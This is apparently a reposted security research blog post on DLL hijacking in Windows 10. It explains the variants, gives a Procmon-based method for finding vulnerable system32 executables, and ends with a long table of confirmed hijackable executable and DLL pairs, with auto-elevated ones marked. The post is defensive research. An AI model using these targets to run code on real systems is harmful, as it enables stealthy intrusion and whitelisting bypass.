Hijacking DLLs in Windows

栏目: IT技术 · 发布时间: 4年前

内容简介:First of all, let’s get the definition out of the way. DLL hijacking is, in the broadest sense, tricking a legitimate/trusted application into loading an arbitrary DLL. Terms such asAttackers have been seen to use DLL hijacking in different ways and for di

DLL Hijacking

First of all, let’s get the definition out of the way. DLL hijacking is, in the broadest sense, tricking a legitimate/trusted application into loading an arbitrary DLL. Terms such as DLL Search Order Hijacking , DLL Load Order Hijacking , DLL Spoofing , DLL Injection and DLL Side-Loading are often -mistakenly- used to say the same. At best such terms describe specific cases of DLL hijacking, but are often used interchangeably and therefore incorrectly. As an umbrella term, DLL hijacking is more accurate, as DLL hijacking always involves a DLL taking over from a legitimate DLL.

Attackers have been seen to use DLL hijacking in different ways and for different reasons. Motives include execution (executing malicious code through a trusted executable may be less likely to set off alarm bells, and in some cases even bypasses application whitelist features such as AppLocker [ 1 ]), obtaining persistence (if the target application is pre-installed and runs regularly, so will the malicious code) and privilege escalation (if the target application runs under elevated permissions, so will the malicious code).

There is a variety of approaches to choose from, with success depending on how the application is configured to load its required DLLs. Possible approaches include:

  1. DLL replacement : replace a legitimate DLL with an evil DLL. This can be combined with DLL Proxying [ 2 ], which ensures all functionality of the original DLL remains intact.
  2. DLL search order hijacking : DLLs specified by an application without a path are searched for in fixed locations in a specific order [ 3 ]. Hijacking the search order takes place by putting the evil DLL in a location that is searched in before the actual DLL. This sometimes includes the working directory of the target application.
  3. Phantom DLL hijacking : drop an evil DLL in place of a missing/non-existing DLL that a legitimate application tries to load [ 4 ].
  4. DLL redirection : change the location in which the DLL is searched for, e.g. by editing the %PATH% environment variable, or .exe.manifest / .exe.local files to include the folder containing the evil DLL [ 5 , 6 ] .
  5. WinSxS DLL replacement : replace the legitimate DLL with the evil DLL in the relevant WinSxS folder of the targeted DLL. Often referred to as DLL side-loading [ 7 ].
  6. Relative path DLL Hijacking: copy (and optionally rename) the legitimate application to a user-writeable folder, alongside the evil DLL. In the way this is used, it has similarities with (Signed) Binary Proxy Execution [ 8 ]. A variation of this is (somewhat oxymoronically called) ‘ bring your own LOLbin ’ [ 9 ] in which the legitimate application is brought with the evil DLL (rather than copied from the legitimate location on the victim’s machine).

Finding vulnerable executables

The biggest challenge is to find a vulnerable executable that can be exploited under default user permissions. When targeting pre-installed system executables on Windows, that typically excludes the first option, whilst any folders eligible in options 2 and 3 have to be user writeable, as should the the files and folder in options 4 and 5. This is usually not the case.

That leaves us with option six, the weakest variant, which the remainder of this post will focus on. Although usually unsuitable to obtain persistence or privilege escalation, it is often seen in the wild. Take OceanLotus/APT32, who at the end of 2019 have been observed to use a legitimate rekeywiz.exe alongside a malicious duser.dll [ 10 , 11 ]. In this case, the malware embedded the legitimate software and dropped it to disk, adopting the ‘ bring your own LOLbin ’ approach (another way of achieving the same would have been to copy the legitimate executable from the \system32\ folder, assuming the executable hasn’t been patched yet).

To prevent new versions of this technique to be successful, it is worthwhile identifying executables that are vulnerable to this kind of DLL hijacking. This will provide red teamers with new means for execution, but more importantly, it will allow threat hunters and defenders to take appropriate measures to detect and prevent.

Approach

To keep things focussed, let’s limit ourselves to the executables present by default in c:\windows\system32\ . On the tested Windows 10 v1909 instance, this comprised a total of 616 executables, or 613 if you only consider signed applications.

To monitor which DLLs each process attempts to load, we’ll use the well-known Procmon [ 12 ] tool. The approach taken is therefore: (1) copy trusted executable to a user-writable location; (2) run copied executable; (3) use Procmon to identify DLLs looked for in user writable location.

Hijacking DLLs in Windows Procmon capturing DLL queries by a copy of winsat.exe, located in c:\users\wietze\downloads\ .

This allows us to identify all DLLs queried by each application, which will be all potential hijackable DLL candidates. But it does not automatically follow that all of these are also loaded (and therefore executed). The most reliable way to find out which DLLs are properly loaded, is to compile our own version of the DLL, and make it write to a unique file upon successfully loading. If we then repeat the above approach for all target executables and DLLs, it will result in a collection of files that tells us which DLLs are confirmed vulnerable to DLL hijacking.

Compiling custom versions of existing DLLs is more challenging than it may sound, as a lot of executables will not load such DLLs if procedures or entry points are missing. Tools such as DLL Export Viewer [ 13 ] can be used to enumerate all external function names and ordinals of the legitimate DLLs. Ensuring that our compiled DLL follows the same format will maximise the chances of it being loaded successfully.

Hijacking DLLs in Windows Sample C code for our own version of dxgi.dll, which showed up in the Procmon recording of winsat.exe.

In summary, the approach taken is:

Hijacking DLLs in Windows

The full code with a more thorough, technical explanation can be found on GitHub [ 14 ].

Confirmed DLL Hijack candidates

The following table lists all executables in c:\windows\system32 on Windows 10 v1909 that are vulnerable to the ‘relative path DLL Hijack’ variant of DLL Hijacking. Next to each executable is one or more DLLs that can be hijacked, together with the procedures of that DLL that are called. As explained in the previous section, these are not mere theoretical targets, these are tested and confirmed to be working . The list comprises 287 executables and 263 unique DLLs.

Auto-elevated Executable DLL Procedure
:heavy_check_mark: bthudtask.exe DEVOBJ.dll DllMain
:heavy_check_mark: computerdefaults.exe CRYPTBASE.DLL DllMain
:heavy_check_mark: computerdefaults.exe edputil.dll DllMain
:heavy_check_mark: computerdefaults.exe edputil.dll EdpGetIsManaged
:heavy_check_mark: computerdefaults.exe MLANG.dll ConvertINetUnicodeToMultiByte
:heavy_check_mark: computerdefaults.exe MLANG.dll DllMain
:heavy_check_mark: computerdefaults.exe PROPSYS.dll DllMain
:heavy_check_mark: computerdefaults.exe PROPSYS.dll PSCreateMemoryPropertyStore
:heavy_check_mark: computerdefaults.exe PROPSYS.dll PSPropertyBag_WriteDWORD
:heavy_check_mark: computerdefaults.exe Secur32.dll DllMain
:heavy_check_mark: computerdefaults.exe SSPICLI.DLL DllMain
:heavy_check_mark: computerdefaults.exe SSPICLI.DLL GetUserNameExW
:heavy_check_mark: computerdefaults.exe WININET.dll DllMain
:heavy_check_mark: computerdefaults.exe WININET.dll GetUrlCacheEntryBinaryBlob
:heavy_check_mark: dccw.exe ColorAdapterClient.dll DllMain
:heavy_check_mark: dccw.exe dxva2.dll DllMain
:heavy_check_mark: dccw.exe mscms.dll DccwReleaseDisplayProfileAssociationList
:heavy_check_mark: dccw.exe mscms.dll DllMain
:heavy_check_mark: dccw.exe mscms.dll WcsGetCalibrationManagementState
:heavy_check_mark: dccw.exe mscms.dll WcsSetCalibrationManagementState
:heavy_check_mark: dccw.exe USERENV.dll DllMain
:heavy_check_mark: easinvoker.exe AUTHZ.dll DllMain
:heavy_check_mark: easinvoker.exe netutils.dll DllMain
:heavy_check_mark: easinvoker.exe samcli.dll DllMain
:heavy_check_mark: easinvoker.exe SAMLIB.dll DllMain
:heavy_check_mark: easpolicymanagerbrokerhost.exe InprocLogger.dll DllMain
:heavy_check_mark: easpolicymanagerbrokerhost.exe InprocLogger.dll FlushInProcTraceSession
:heavy_check_mark: easpolicymanagerbrokerhost.exe InprocLogger.dll InitializeInProcLogger
:heavy_check_mark: easpolicymanagerbrokerhost.exe InprocLogger.dll InitializeInProcTraceFlushTrigger
:heavy_check_mark: easpolicymanagerbrokerhost.exe InprocLogger.dll InitializeInProcTraceSession
:heavy_check_mark: easpolicymanagerbrokerhost.exe InprocLogger.dll ShutdownInProcLogger
:heavy_check_mark: easpolicymanagerbrokerhost.exe InprocLogger.dll ShutdownInProcTraceSession
:heavy_check_mark: easpolicymanagerbrokerhost.exe InprocLogger.dll StopInProcTraceSession
:heavy_check_mark: easpolicymanagerbrokerhost.exe policymanager.dll DllMain
:heavy_check_mark: fodhelper.exe CRYPTBASE.DLL DllMain
:heavy_check_mark: fodhelper.exe edputil.dll DllMain
:heavy_check_mark: fodhelper.exe edputil.dll EdpGetIsManaged
:heavy_check_mark: fodhelper.exe MLANG.dll ConvertINetUnicodeToMultiByte
:heavy_check_mark: fodhelper.exe MLANG.dll DllMain
:heavy_check_mark: fodhelper.exe PROPSYS.dll DllMain
:heavy_check_mark: fodhelper.exe PROPSYS.dll PSCreateMemoryPropertyStore
:heavy_check_mark: fodhelper.exe PROPSYS.dll PSPropertyBag_WriteDWORD
:heavy_check_mark: fodhelper.exe Secur32.dll DllMain
:heavy_check_mark: fodhelper.exe SSPICLI.DLL DllMain
:heavy_check_mark: fodhelper.exe SSPICLI.DLL GetUserNameExW
:heavy_check_mark: fodhelper.exe WININET.dll DllMain
:heavy_check_mark: fodhelper.exe WININET.dll GetUrlCacheEntryBinaryBlob
:heavy_check_mark: fsavailux.exe DEVOBJ.dll DllMain
:heavy_check_mark: fxsunatd.exe FXSAPI.dll DllMain
:heavy_check_mark: fxsunatd.exe FXSAPI.dll FaxConnectFaxServerW
:heavy_check_mark: fxsunatd.exe IPHLPAPI.DLL DllMain
:heavy_check_mark: fxsunatd.exe PROPSYS.dll DllMain
:heavy_check_mark: immersivetpmvscmgrsvr.exe DEVOBJ.dll DllMain
:heavy_check_mark: iscsicli.exe DEVOBJ.dll DllMain
:heavy_check_mark: iscsicli.exe ISCSIDSC.dll DllMain
:heavy_check_mark: iscsicli.exe ISCSIDSC.dll GetIScsiVersionInformation
:heavy_check_mark: iscsicli.exe ISCSIUM.dll DiscpAllocMemory
:heavy_check_mark: iscsicli.exe ISCSIUM.dll DiscpRegisterHeap
:heavy_check_mark: iscsicli.exe ISCSIUM.dll DllMain
:heavy_check_mark: iscsicli.exe WMICLNT.dll DllMain
:heavy_check_mark: mdsched.exe bcd.dll DllMain
:heavy_check_mark: mschedexe.exe MaintenanceUI.dll DllMain
:heavy_check_mark: msconfig.exe ATL.DLL AtlModuleInit
:heavy_check_mark: msconfig.exe ATL.DLL AtlModuleRegisterClassObjects
:heavy_check_mark: msconfig.exe ATL.DLL DllMain
:heavy_check_mark: msconfig.exe bcd.dll DllMain
:heavy_check_mark: msdt.exe ATL.DLL DllMain
:heavy_check_mark: msdt.exe Cabinet.dll DllMain
:heavy_check_mark: msdt.exe SSPICLI.DLL DllMain
:heavy_check_mark: msdt.exe UxTheme.dll DllMain
:heavy_check_mark: msdt.exe wer.dll DllMain
:heavy_check_mark: msdt.exe WINHTTP.dll DllMain
:heavy_check_mark: multidigimon.exe NInput.dll DllMain
:heavy_check_mark: netplwiz.exe CRYPTBASE.dll DllMain
:heavy_check_mark: netplwiz.exe DSROLE.dll DllMain
:heavy_check_mark: netplwiz.exe DSROLE.dll DsRoleGetPrimaryDomainInformation
:heavy_check_mark: netplwiz.exe NETPLWIZ.dll DllMain
:heavy_check_mark: netplwiz.exe NETPLWIZ.dll UsersRunDllW
:heavy_check_mark: netplwiz.exe netutils.dll DllMain
:heavy_check_mark: netplwiz.exe netutils.dll NetApiBufferFree
:heavy_check_mark: netplwiz.exe PROPSYS.dll DllMain
:heavy_check_mark: netplwiz.exe samcli.dll DllMain
:heavy_check_mark: netplwiz.exe samcli.dll NetUserGetInfo
:heavy_check_mark: netplwiz.exe SAMLIB.dll DllMain
:heavy_check_mark: netplwiz.exe SAMLIB.dll SamConnect
:heavy_check_mark: netplwiz.exe SAMLIB.dll SamEnumerateDomainsInSamServer
:heavy_check_mark: netplwiz.exe SAMLIB.dll SamFreeMemory
:heavy_check_mark: optionalfeatures.exe DUI70.dll DllMain
:heavy_check_mark: optionalfeatures.exe DUI70.dll InitProcessPriv
:heavy_check_mark: optionalfeatures.exe DUI70.dll RegisterBaseControls
:heavy_check_mark: optionalfeatures.exe DUI70.dll RegisterCommonControls
:heavy_check_mark: optionalfeatures.exe DUI70.dll RegisterExtendedControls
:heavy_check_mark: optionalfeatures.exe DUI70.dll RegisterStandardControls
:heavy_check_mark: optionalfeatures.exe msi.dll DllMain
:heavy_check_mark: optionalfeatures.exe OLEACC.dll CreateStdAccessibleObject
:heavy_check_mark: optionalfeatures.exe OLEACC.dll DllMain
:heavy_check_mark: optionalfeatures.exe OLEACC.dll GetRoleTextW
:heavy_check_mark: optionalfeatures.exe osbaseln.dll CloseOsBaseline
:heavy_check_mark: optionalfeatures.exe osbaseln.dll DllMain
:heavy_check_mark: optionalfeatures.exe osbaseln.dll OpenOsBaseline
:heavy_check_mark: optionalfeatures.exe PROPSYS.dll DllMain
:heavy_check_mark: perfmon.exe ATL.DLL DllMain
:heavy_check_mark: perfmon.exe credui.dll DllMain
:heavy_check_mark: perfmon.exe SspiCli.dll DllMain
:heavy_check_mark: printui.exe IPHLPAPI.DLL DllMain
:heavy_check_mark: printui.exe printui.dll DllMain
:heavy_check_mark: printui.exe printui.dll PrintUIEntryW
:heavy_check_mark: printui.exe PROPSYS.dll DllMain
:heavy_check_mark: printui.exe puiapi.dll DllMain
:heavy_check_mark: recdisc.exe bcd.dll DllMain
:heavy_check_mark: recdisc.exe Cabinet.dll DllMain
:heavy_check_mark: recdisc.exe ReAgent.dll DllMain
:heavy_check_mark: rstrui.exe bcd.dll DllMain
:heavy_check_mark: rstrui.exe ktmw32.dll DllMain
:heavy_check_mark: rstrui.exe SPP.dll DllMain
:heavy_check_mark: rstrui.exe SPP.dll SxTracerGetThreadContextRetail
:heavy_check_mark: rstrui.exe SRCORE.dll DllMain
:heavy_check_mark: rstrui.exe SRCORE.dll SrFreeRestoreStatus
:heavy_check_mark: rstrui.exe VSSAPI.DLL DllMain
:heavy_check_mark: rstrui.exe VssTrace.DLL DllMain
:heavy_check_mark: rstrui.exe wer.dll DllMain
:heavy_check_mark: sdclt.exe bcd.dll DllMain
:heavy_check_mark: sdclt.exe Cabinet.dll DllMain
:heavy_check_mark: sdclt.exe CLDAPI.dll CfGetPlaceholderStateFromAttributeTag
:heavy_check_mark: sdclt.exe CLDAPI.dll DllMain
:heavy_check_mark: sdclt.exe CRYPTBASE.DLL DllMain
:heavy_check_mark: sdclt.exe edputil.dll DllMain
:heavy_check_mark: sdclt.exe edputil.dll EdpGetIsManaged
:heavy_check_mark: sdclt.exe FLTLIB.DLL DllMain
:heavy_check_mark: sdclt.exe PROPSYS.dll DllMain
:heavy_check_mark: sdclt.exe PROPSYS.dll PSCreateMemoryPropertyStore
:heavy_check_mark: sdclt.exe PROPSYS.dll PSPropertyBag_WriteDWORD
:heavy_check_mark: sdclt.exe ReAgent.dll DllMain
:heavy_check_mark: sdclt.exe SPP.dll DllMain
:heavy_check_mark: sdclt.exe SPP.dll SxTracerGetThreadContextRetail
:heavy_check_mark: sdclt.exe SspiCli.dll DllMain
:heavy_check_mark: sdclt.exe SspiCli.dll GetUserNameExW
:heavy_check_mark: sdclt.exe UxTheme.dll DllMain
:heavy_check_mark: sdclt.exe VSSAPI.DLL DllMain
:heavy_check_mark: sdclt.exe VssTrace.DLL DllMain
:heavy_check_mark: sdclt.exe wer.dll DllMain
:heavy_check_mark: sdclt.exe WTSAPI32.dll DllMain
:heavy_check_mark: systempropertiesadvanced.exe bcd.dll DllMain
:heavy_check_mark: systempropertiesadvanced.exe credui.dll DllMain
:heavy_check_mark: systempropertiesadvanced.exe DNSAPI.dll DllMain
:heavy_check_mark: systempropertiesadvanced.exe DSROLE.DLL DllMain
:heavy_check_mark: systempropertiesadvanced.exe DSROLE.DLL DsRoleGetPrimaryDomainInformation
:heavy_check_mark: systempropertiesadvanced.exe LOGONCLI.DLL DllMain
:heavy_check_mark: systempropertiesadvanced.exe netid.dll CreateNetIDPropertyPage
:heavy_check_mark: systempropertiesadvanced.exe netid.dll DllMain
:heavy_check_mark: systempropertiesadvanced.exe NETUTILS.DLL DllMain
:heavy_check_mark: systempropertiesadvanced.exe SRVCLI.DLL DllMain
:heavy_check_mark: systempropertiesadvanced.exe WINBRAND.dll DllMain
:heavy_check_mark: systempropertiesadvanced.exe WINSTA.dll DllMain
:heavy_check_mark: systempropertiesadvanced.exe WKSCLI.DLL DllMain
:heavy_check_mark: systempropertiescomputername.exe bcd.dll DllMain
:heavy_check_mark: systempropertiescomputername.exe WINSTA.dll DllMain
:heavy_check_mark: systempropertiesdataexecutionprevention.exe bcd.dll DllMain
:heavy_check_mark: systempropertiesdataexecutionprevention.exe WINSTA.dll DllMain
:heavy_check_mark: systempropertieshardware.exe bcd.dll DllMain
:heavy_check_mark: systempropertieshardware.exe WINSTA.dll DllMain
:heavy_check_mark: systempropertiesprotection.exe bcd.dll DllMain
:heavy_check_mark: systempropertiesprotection.exe WINSTA.dll DllMain
:heavy_check_mark: systempropertiesremote.exe bcd.dll DllMain
:heavy_check_mark: systempropertiesremote.exe WINSTA.dll DllMain
:heavy_check_mark: systemreset.exe bcd.dll BcdCloseObject
:heavy_check_mark: systemreset.exe bcd.dll BcdCloseStore
:heavy_check_mark: systemreset.exe bcd.dll BcdFlushStore
:heavy_check_mark: systemreset.exe bcd.dll BcdGetElementData
:heavy_check_mark: systemreset.exe bcd.dll BcdOpenObject
:heavy_check_mark: systemreset.exe bcd.dll BcdOpenStore
:heavy_check_mark: systemreset.exe bcd.dll DllMain
:heavy_check_mark: systemreset.exe Cabinet.dll DllMain
:heavy_check_mark: systemreset.exe d3d10warp.dll DllMain
:heavy_check_mark: systemreset.exe d3d10warp.dll OpenAdapter10_2
:heavy_check_mark: systemreset.exe d3d11.dll D3D11CreateDevice
:heavy_check_mark: systemreset.exe d3d11.dll DllMain
:heavy_check_mark: systemreset.exe dbgcore.DLL DllMain
:heavy_check_mark: systemreset.exe DismApi.DLL DllMain
:heavy_check_mark: systemreset.exe dxgi.dll CreateDXGIFactory1
:heavy_check_mark: systemreset.exe dxgi.dll DllMain
:heavy_check_mark: systemreset.exe FVEAPI.dll DllMain
:heavy_check_mark: systemreset.exe FVEAPI.dll FveGetStatus
:heavy_check_mark: systemreset.exe FVEAPI.dll FveOpenVolumeW
:heavy_check_mark: systemreset.exe ReAgent.dll DllMain
:heavy_check_mark: systemreset.exe ReAgent.dll WinReGetConfig
:heavy_check_mark: systemreset.exe ResetEngine.dll DllMain
:heavy_check_mark: systemreset.exe ResetEngine.dll ResetCreateSession
:heavy_check_mark: systemreset.exe ResetEngine.dll ResetReleaseSession
:heavy_check_mark: systemreset.exe ResetEngine.dll ResetTraceClientInfo
:heavy_check_mark: systemreset.exe ResetEngine.dll ResetValidateScenario
:heavy_check_mark: systemreset.exe tbs.dll DllMain
:heavy_check_mark: systemreset.exe VSSAPI.DLL DllMain
:heavy_check_mark: systemreset.exe VssTrace.DLL DllMain
:heavy_check_mark: systemreset.exe WDSCORE.dll ConstructPartialMsgVW
:heavy_check_mark: systemreset.exe WDSCORE.dll CurrentIP
:heavy_check_mark: systemreset.exe WDSCORE.dll DllMain
:heavy_check_mark: systemreset.exe WDSCORE.dll WdsInitialize
:heavy_check_mark: systemreset.exe WDSCORE.dll WdsSetupLogMessageW
:heavy_check_mark: systemreset.exe WIMGAPI.DLL DllMain
:heavy_check_mark: systemreset.exe WIMGAPI.DLL WIMCreateFile
:heavy_check_mark: systemreset.exe WINHTTP.dll DllMain
:heavy_check_mark: systemreset.exe WOFUTIL.dll DllMain
:heavy_check_mark: systemreset.exe XmlLite.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe AppXDeploymentClient.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe Bcp47Langs.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe DEVRTL.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe DismApi.DLL DllMain
:heavy_check_mark: systemsettingsadminflows.exe DNSAPI.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe FirewallAPI.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe fwbase.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe fwbase.dll FwCriticalSectionCreate
:heavy_check_mark: systemsettingsadminflows.exe fwbase.dll FwCriticalSectionDestroy
:heavy_check_mark: systemsettingsadminflows.exe logoncli.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe netutils.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe newdev.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe PROPSYS.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe samcli.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe SspiCli.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe StateRepository.Core.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe SystemSettingsThresholdAdminFlowUI.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe timesync.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe USERENV.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe WINBRAND.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe wkscli.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe Wldp.dll DllMain
:heavy_check_mark: systemsettingsadminflows.exe WTSAPI32.dll DllMain
:heavy_check_mark: taskmgr.exe credui.dll DllMain
:heavy_check_mark: taskmgr.exe d3d11.dll DllMain
:heavy_check_mark: taskmgr.exe d3d12.dll DllMain
:heavy_check_mark: taskmgr.exe dxgi.dll DllMain
:heavy_check_mark: taskmgr.exe pdh.dll DllMain
:heavy_check_mark: taskmgr.exe UxTheme.dll DllMain
:heavy_check_mark: tcmsetup.exe TAPI32.dll DllMain
:heavy_check_mark: winsat.exe d3d10_1.dll DllMain
:heavy_check_mark: winsat.exe d3d10_1core.dll DllMain
:heavy_check_mark: winsat.exe d3d10.dll DllMain
:heavy_check_mark: winsat.exe d3d10core.dll DllMain
:heavy_check_mark: winsat.exe d3d11.dll DllMain
:heavy_check_mark: winsat.exe dxgi.dll DllMain
:heavy_check_mark: winsat.exe winmm.dll DllMain
:heavy_check_mark: wsreset.exe licensemanagerapi.dll DllMain
:heavy_check_mark: wsreset.exe licensemanagerapi.dll Reset
:heavy_check_mark: wsreset.exe wevtapi.dll DllMain
:heavy_check_mark: wusa.exe dpx.dll DllMain
:heavy_check_mark: wusa.exe WTSAPI32.dll DllMain
:x: agentservice.exe ACTIVEDS.dll DllMain
:x: agentservice.exe adsldpc.dll DllMain
:x: agentservice.exe FLTLIB.DLL DllMain
:x: applytrustoffline.exe mintdh.dll DllMain
:x: applytrustoffline.exe mintdh.dll TdhpSetWbemExtensionBlock
:x: applytrustoffline.exe StateRepository.Core.dll DllMain
:x: arp.exe IPHLPAPI.DLL DllMain
:x: arp.exe snmpapi.dll DllMain
:x: at.exe cryptdll.dll DllMain
:x: at.exe netutils.dll DllMain
:x: at.exe NtlmShared.dll DllMain
:x: at.exe schedcli.dll DllMain
:x: at.exe schedcli.dll NetScheduleJobEnum
:x: at.exe sspicli.dll DllMain
:x: at.exe sspicli.dll InitSecurityInterfaceW
:x: auditpol.exe auditpolcore.dll AdtEnableSinglePrivilege
:x: auditpol.exe auditpolcore.dll AuditPolicyData_DeleteAuditDataInstance
:x: auditpol.exe auditpolcore.dll DllMain
:x: auditpol.exe auditpolcore.dll LoadFormatStringAndPrintToConsole
:x: baaupdate.exe FVEAPI.dll DllMain
:x: bdechangepin.exe FVEAPI.dll DllMain
:x: bdechangepin.exe FVEAPI.dll FveGetAuthMethodInformation
:x: bdechangepin.exe FVEAPI.dll FveGetStatus
:x: bdechangepin.exe FVEAPI.dll FveOpenVolumeW
:x: bdeuisrv.exe USERENV.dll DllMain
:x: bdeuisrv.exe WTSAPI32.dll DllMain
:x: bioiso.exe iumbase.DLL DllMain
:x: bootim.exe bcd.dll BcdGetElementData
:x: bootim.exe bcd.dll BcdOpenObject
:x: bootim.exe bcd.dll BcdOpenSystemStore
:x: bootim.exe bcd.dll BcdQueryObject
:x: bootim.exe bcd.dll DllMain
:x: bootim.exe BootMenuUX.DLL CreateBareMetalRecoveryButton
:x: bootim.exe BootMenuUX.DLL CreateBootableOSButtonCollection
:x: bootim.exe BootMenuUX.DLL CreateCloudRecoveryButton
:x: bootim.exe BootMenuUX.DLL CreateDefaultOSButton
:x: bootim.exe BootMenuUX.DLL CreateDeviceListButton
:x: bootim.exe BootMenuUX.DLL CreateDirectFactoryResetButton
:x: bootim.exe BootMenuUX.DLL CreateOSListButton
:x: bootim.exe BootMenuUX.DLL CreateRecoveryToolsListButton
:x: bootim.exe BootMenuUX.DLL CreateSelectOSPage
:x: bootim.exe BootMenuUX.DLL CreateShutdownButton
:x: bootim.exe BootMenuUX.DLL DllMain
:x: bootim.exe Cabinet.dll DllMain
:x: bootim.exe dbghelp.dll DllMain
:x: bootim.exe DismApi.DLL DllMain
:x: bootim.exe FLTLIB.DLL DllMain
:x: bootim.exe OLEACC.dll DllMain
:x: bootim.exe OLEACC.dll GetRoleTextW
:x: bootim.exe PROPSYS.dll DllMain
:x: bootim.exe PROPSYS.dll PSCreateMemoryPropertyStore
:x: bootim.exe ReAgent.dll DllMain
:x: bootim.exe ReAgent.dll WinReGetConfig
:x: bootim.exe ResetEng.dll DllMain
:x: bootim.exe tbs.dll DllMain
:x: bootim.exe VirtDisk.dll DllMain
:x: bootim.exe VSSAPI.DLL DllMain
:x: bootim.exe VssTrace.DLL DllMain
:x: bootim.exe WDSCORE.dll ConstructPartialMsgVW
:x: bootim.exe WDSCORE.dll CurrentIP
:x: bootim.exe WDSCORE.dll DllMain
:x: bootim.exe WDSCORE.dll WdsSetupLogMessageW
:x: calc.exe CRYPTBASE.DLL DllMain
:x: calc.exe edputil.dll DllMain
:x: calc.exe edputil.dll EdpGetIsManaged
:x: calc.exe MLANG.dll ConvertINetUnicodeToMultiByte
:x: calc.exe MLANG.dll DllMain
:x: calc.exe PROPSYS.dll DllMain
:x: calc.exe PROPSYS.dll PSCreateMemoryPropertyStore
:x: calc.exe PROPSYS.dll PSPropertyBag_WriteDWORD
:x: calc.exe Secur32.dll DllMain
:x: calc.exe SSPICLI.DLL DllMain
:x: calc.exe SSPICLI.DLL GetUserNameExW
:x: calc.exe WININET.dll DllMain
:x: calc.exe WININET.dll GetUrlCacheEntryBinaryBlob
:x: certreq.exe cscapi.dll CscNetApiGetInterface
:x: certreq.exe cscapi.dll DllMain
:x: certreq.exe DUI70.dll DllMain
:x: certreq.exe DUI70.dll FlushThemeHandles
:x: certreq.exe DUI70.dll InitProcessPriv
:x: certreq.exe DUI70.dll InitThread
:x: certreq.exe dwmapi.dll DllMain
:x: certreq.exe dwmapi.dll DwmSetWindowAttribute
:x: certreq.exe LINKINFO.dll DllMain
:x: certreq.exe LINKINFO.dll IsValidLinkInfo
:x: certreq.exe SSPICLI.DLL DllMain
:x: certreq.exe WindowsCodecs.dll DllMain
:x: certreq.exe WindowsCodecs.dll WICCreateImagingFactory_Proxy
:x: certreq.exe WININET.dll DllMain
:x: certreq.exe XmlLite.dll CreateXmlReader
:x: certreq.exe XmlLite.dll CreateXmlReaderInputWithEncodingName
:x: certreq.exe XmlLite.dll DllMain
:x: certutil.exe Cabinet.dll DllMain
:x: certutil.exe CRYPTUI.dll DllMain
:x: certutil.exe DSROLE.DLL DllMain
:x: certutil.exe LOGONCLI.DLL DllMain
:x: certutil.exe NETUTILS.DLL DllMain
:x: certutil.exe NTDSAPI.dll DllMain
:x: certutil.exe SAMCLI.DLL DllMain
:x: certutil.exe SSPICLI.DLL DllMain
:x: change.exe logoncli.dll DllMain
:x: change.exe netutils.dll DllMain
:x: change.exe samcli.dll DllMain
:x: change.exe srvcli.dll DllMain
:x: change.exe utildll.dll DllMain
:x: change.exe WINSTA.dll DllMain
:x: charmap.exe GetUName.dll DllMain
:x: charmap.exe MSFTEDIT.DLL DllMain
:x: checknetisolation.exe DNSAPI.dll DllMain
:x: checknetisolation.exe FirewallAPI.dll DllMain
:x: checknetisolation.exe fwbase.dll DllMain
:x: checknetisolation.exe fwbase.dll FwAlloc
:x: checknetisolation.exe fwbase.dll FwCriticalSectionCreate
:x: checknetisolation.exe fwbase.dll FwCriticalSectionDestroy
:x: checknetisolation.exe fwbase.dll FwFree
:x: checknetisolation.exe fwpuclnt.dll DllMain
:x: chglogon.exe logoncli.dll DllMain
:x: chglogon.exe netutils.dll DllMain
:x: chglogon.exe REGAPI.dll DllMain
:x: chglogon.exe samcli.dll DllMain
:x: chglogon.exe srvcli.dll DllMain
:x: chglogon.exe utildll.dll DllMain
:x: chglogon.exe WINSTA.dll DllMain
:x: chgport.exe logoncli.dll DllMain
:x: chgport.exe netutils.dll DllMain
:x: chgport.exe samcli.dll DllMain
:x: chgport.exe srvcli.dll DllMain
:x: chgport.exe utildll.dll DllMain
:x: chgport.exe WINSTA.dll DllMain
:x: chkdsk.exe DEVOBJ.dll DllMain
:x: chkntfs.exe DEVOBJ.dll DllMain
:x: cipher.exe DSROLE.dll DllMain
:x: cipher.exe EFSUTIL.dll DllMain
:x: cipher.exe FeClient.dll DllMain
:x: cipher.exe iertutil.dll DllMain
:x: cipher.exe NTDSAPI.dll DllMain
:x: cipher.exe VAULTCLI.dll DllMain
:x: clipup.exe CRYPTXML.dll DllMain
:x: clipup.exe webservices.dll DllMain
:x: cmdl32.exe Cabinet.dll DllMain
:x: cmdl32.exe cmpbk32.dll DllMain
:x: cmdl32.exe RASAPI32.dll DllMain
:x: cmdl32.exe rasman.dll DllMain
:x: cmdl32.exe WINHTTP.dll DllMain
:x: colorcpl.exe ColorAdapterClient.dll DllMain
:x: colorcpl.exe colorui.dll DllMain
:x: colorcpl.exe colorui.dll LaunchColorCpl
:x: colorcpl.exe IPHLPAPI.DLL DllMain
:x: colorcpl.exe mscms.dll ColorCplInitialize
:x: colorcpl.exe mscms.dll ColorCplUninitialize
:x: colorcpl.exe mscms.dll DllMain
:x: colorcpl.exe PROPSYS.dll DllMain
:x: colorcpl.exe USERENV.dll DllMain
:x: compmgmtlauncher.exe apphelp.dll ApphelpCheckShellObject
:x: compmgmtlauncher.exe apphelp.dll DllMain
:x: compmgmtlauncher.exe CLDAPI.dll CfGetPlaceholderStateFromAttributeTag
:x: compmgmtlauncher.exe CLDAPI.dll DllMain
:x: compmgmtlauncher.exe CRYPTBASE.dll DllMain
:x: compmgmtlauncher.exe CRYPTBASE.dll SystemFunction036
:x: compmgmtlauncher.exe edputil.dll DllMain
:x: compmgmtlauncher.exe edputil.dll EdpGetIsManaged
:x: compmgmtlauncher.exe FLTLIB.DLL DllMain
